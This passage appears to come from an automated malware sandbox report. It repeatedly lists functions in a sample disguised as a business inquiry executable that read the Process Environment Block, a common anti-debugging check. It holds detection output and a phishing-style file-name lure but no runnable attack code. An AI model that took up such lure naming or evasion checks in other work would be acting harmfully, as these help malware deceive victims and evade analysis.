                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov ecx, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9A352 mov eax, dword ptr fs:[00000030h]4_2_00F9A352
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A30B mov eax, dword ptr fs:[00000030h]4_2_00F0A30B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A30B mov eax, dword ptr fs:[00000030h]4_2_00F0A30B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A30B mov eax, dword ptr fs:[00000030h]4_2_00F0A30B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECC310 mov ecx, dword ptr fs:[00000030h]4_2_00ECC310
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF0310 mov ecx, dword ptr fs:[00000030h]4_2_00EF0310
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED04E5 mov ecx, dword ptr fs:[00000030h]4_2_00ED04E5
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F044B0 mov ecx, dword ptr fs:[00000030h]4_2_00F044B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5A4B0 mov eax, dword ptr fs:[00000030h]4_2_00F5A4B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED64AB mov eax, dword ptr fs:[00000030h]4_2_00ED64AB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8A49A mov eax, dword ptr fs:[00000030h]4_2_00F8A49A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5C460 mov ecx, dword ptr fs:[00000030h]4_2_00F5C460
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFA470 mov eax, dword ptr fs:[00000030h]4_2_00EFA470
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFA470 mov eax, dword ptr fs:[00000030h]4_2_00EFA470
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFA470 mov eax, dword ptr fs:[00000030h]4_2_00EFA470
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8A456 mov eax, dword ptr fs:[00000030h]4_2_00F8A456
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC645D mov eax, dword ptr fs:[00000030h]4_2_00EC645D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF245A mov eax, dword ptr fs:[00000030h]4_2_00EF245A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A430 mov eax, dword ptr fs:[00000030h]4_2_00F0A430
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECC427 mov eax, dword ptr fs:[00000030h]4_2_00ECC427
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE420 mov eax, dword ptr fs:[00000030h]4_2_00ECE420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE420 mov eax, dword ptr fs:[00000030h]4_2_00ECE420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE420 mov eax, dword ptr fs:[00000030h]4_2_00ECE420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08402 mov eax, dword ptr fs:[00000030h]4_2_00F08402
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08402 mov eax, dword ptr fs:[00000030h]4_2_00F08402
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08402 mov eax, dword ptr fs:[00000030h]4_2_00F08402
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED25E0 mov eax, dword ptr fs:[00000030h]4_2_00ED25E0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C5ED mov eax, dword ptr fs:[00000030h]4_2_00F0C5ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C5ED mov eax, dword ptr fs:[00000030h]4_2_00F0C5ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A5D0 mov eax, dword ptr fs:[00000030h]4_2_00F0A5D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A5D0 mov eax, dword ptr fs:[00000030h]4_2_00F0A5D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED65D0 mov eax, dword ptr fs:[00000030h]4_2_00ED65D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E5CF mov eax, dword ptr fs:[00000030h]4_2_00F0E5CF
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E5CF mov eax, dword ptr fs:[00000030h]4_2_00F0E5CF
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F505A7 mov eax, dword ptr fs:[00000030h]4_2_00F505A7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F505A7 mov eax, dword ptr fs:[00000030h]4_2_00F505A7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F505A7 mov eax, dword ptr fs:[00000030h]4_2_00F505A7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF45B1 mov eax, dword ptr fs:[00000030h]4_2_00EF45B1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF45B1 mov eax, dword ptr fs:[00000030h]4_2_00EF45B1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E59C mov eax, dword ptr fs:[00000030h]4_2_00F0E59C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED2582 mov eax, dword ptr fs:[00000030h]4_2_00ED2582
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED2582 mov ecx, dword ptr fs:[00000030h]4_2_00ED2582
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F04588 mov eax, dword ptr fs:[00000030h]4_2_00F04588
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0656A mov eax, dword ptr fs:[00000030h]4_2_00F0656A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0656A mov eax, dword ptr fs:[00000030h]4_2_00F0656A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0656A mov eax, dword ptr fs:[00000030h]4_2_00F0656A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8550 mov eax, dword ptr fs:[00000030h]4_2_00ED8550
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8550 mov eax, dword ptr fs:[00000030h]4_2_00ED8550
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F66500 mov eax, dword ptr fs:[00000030h]4_2_00F66500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F506F1 mov eax, dword ptr fs:[00000030h]4_2_00F506F1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F506F1 mov eax, dword ptr fs:[00000030h]4_2_00F506F1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E6F2 mov eax, dword ptr fs:[00000030h]4_2_00F4E6F2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E6F2 mov eax, dword ptr fs:[00000030h]4_2_00F4E6F2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E6F2 mov eax, dword ptr fs:[00000030h]4_2_00F4E6F2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E6F2 mov eax, dword ptr fs:[00000030h]4_2_00F4E6F2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A6C7 mov ebx, dword ptr fs:[00000030h]4_2_00F0A6C7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A6C7 mov eax, dword ptr fs:[00000030h]4_2_00F0A6C7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F066B0 mov eax, dword ptr fs:[00000030h]4_2_00F066B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C6A6 mov eax, dword ptr fs:[00000030h]4_2_00F0C6A6
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4690 mov eax, dword ptr fs:[00000030h]4_2_00ED4690
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4690 mov eax, dword ptr fs:[00000030h]4_2_00ED4690
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F02674 mov eax, dword ptr fs:[00000030h]4_2_00F02674
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A660 mov eax, dword ptr fs:[00000030h]4_2_00F0A660
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A660 mov eax, dword ptr fs:[00000030h]4_2_00F0A660
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9866E mov eax, dword ptr fs:[00000030h]4_2_00F9866E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9866E mov eax, dword ptr fs:[00000030h]4_2_00F9866E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEC640 mov eax, dword ptr fs:[00000030h]4_2_00EEC640
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED262C mov eax, dword ptr fs:[00000030h]4_2_00ED262C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE627 mov eax, dword ptr fs:[00000030h]4_2_00EEE627
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F06620 mov eax, dword ptr fs:[00000030h]4_2_00F06620
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08620 mov eax, dword ptr fs:[00000030h]4_2_00F08620
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE260B mov eax, dword ptr fs:[00000030h]4_2_00EE260B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12619 mov eax, dword ptr fs:[00000030h]4_2_00F12619
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E609 mov eax, dword ptr fs:[00000030h]4_2_00F4E609
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF27ED mov eax, dword ptr fs:[00000030h]4_2_00EF27ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF27ED mov eax, dword ptr fs:[00000030h]4_2_00EF27ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF27ED mov eax, dword ptr fs:[00000030h]4_2_00EF27ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5E7E1 mov eax, dword ptr fs:[00000030h]4_2_00F5E7E1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED47FB mov eax, dword ptr fs:[00000030h]4_2_00ED47FB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED47FB mov eax, dword ptr fs:[00000030h]4_2_00ED47FB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDC7C0 mov eax, dword ptr fs:[00000030h]4_2_00EDC7C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F507C3 mov eax, dword ptr fs:[00000030h]4_2_00F507C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED07AF mov eax, dword ptr fs:[00000030h]4_2_00ED07AF
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F847A0 mov eax, dword ptr fs:[00000030h]4_2_00F847A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7678E mov eax, dword ptr fs:[00000030h]4_2_00F7678E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8770 mov eax, dword ptr fs:[00000030h]4_2_00ED8770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0770 mov eax, dword ptr fs:[00000030h]4_2_00EE0770
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F54755 mov eax, dword ptr fs:[00000030h]4_2_00F54755
